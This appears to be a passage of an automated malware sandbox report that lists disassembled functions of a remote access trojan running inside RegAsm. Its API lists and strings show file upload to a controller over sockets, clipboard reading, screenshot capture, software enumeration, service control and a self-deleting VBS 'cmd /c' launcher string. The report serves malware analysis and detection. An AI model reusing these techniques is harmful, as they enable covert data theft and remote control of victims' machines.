                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                  • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                  • API String ID: 1332880857-3714951968
                                                  • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                  • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                  Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1657328048-3535843008
                                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                  Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                  • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                  Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                  • API String ID: 3086580692-2582957567
                                                  • Opcode ID: ec79447335530b9eedf105eee5ae2cdf40cfe98c019c56848c9afd0be4808a34
                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                  • Opcode Fuzzy Hash: ec79447335530b9eedf105eee5ae2cdf40cfe98c019c56848c9afd0be4808a34
                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                  Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                  • _free.LIBCMT ref: 0045137F
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004513A1
                                                  • _free.LIBCMT ref: 004513B6
                                                  • _free.LIBCMT ref: 004513C1
                                                  • _free.LIBCMT ref: 004513E3
                                                  • _free.LIBCMT ref: 004513F6
                                                  • _free.LIBCMT ref: 00451404
                                                  • _free.LIBCMT ref: 0045140F
                                                  • _free.LIBCMT ref: 00451447
                                                  • _free.LIBCMT ref: 0045144E
                                                  • _free.LIBCMT ref: 0045146B
                                                  • _free.LIBCMT ref: 00451483
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                  Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                  • API String ID: 489098229-1431523004
                                                  • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                  • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                  Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                    • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  • API String ID: 1913171305-3159800282
                                                  • Opcode ID: dda712aef153cb898e631072e72fe0db0f6fd633386d1581d5cca256f87fe17c
                                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                  • Opcode Fuzzy Hash: dda712aef153cb898e631072e72fe0db0f6fd633386d1581d5cca256f87fe17c
                                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                  Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                  • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                  Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                  • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                  Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                  • GetFileType.KERNEL32 ref: 00455D82
                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                  Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: \&G$\&G$`&G
                                                  • API String ID: 269201875-253610517
                                                  • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                  • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                  Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                  Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                  • _free.LIBCMT ref: 0043A9C3
                                                  • _free.LIBCMT ref: 0043A9CA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                  • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                  Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                  • GetMessageA.USER32 ref: 0040556F
                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 8bf319eff18f9cbbe9b5f0af86abf83c791be4b498861229a483a29bb5c83ecd
                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                  • Opcode Fuzzy Hash: 8bf319eff18f9cbbe9b5f0af86abf83c791be4b498861229a483a29bb5c83ecd
                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                  Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                  • String ID: 0VG$0VG$<$@$Temp
                                                  • API String ID: 1704390241-2575729100
                                                  • Opcode ID: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                  • Opcode Fuzzy Hash: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                  Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 0041697C
                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32 ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID: !D@
                                                  • API String ID: 2172192267-604454484
                                                  • Opcode ID: d45687c870201b0dabbd41d7f1757c88dbe4de035b9da3459f2691080a45fbe1
                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                  • Opcode Fuzzy Hash: d45687c870201b0dabbd41d7f1757c88dbe4de035b9da3459f2691080a45fbe1
                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                  Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                  • String ID:
                                                  • API String ID: 297527592-0
                                                  • Opcode ID: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                  • Opcode Fuzzy Hash: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                  Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
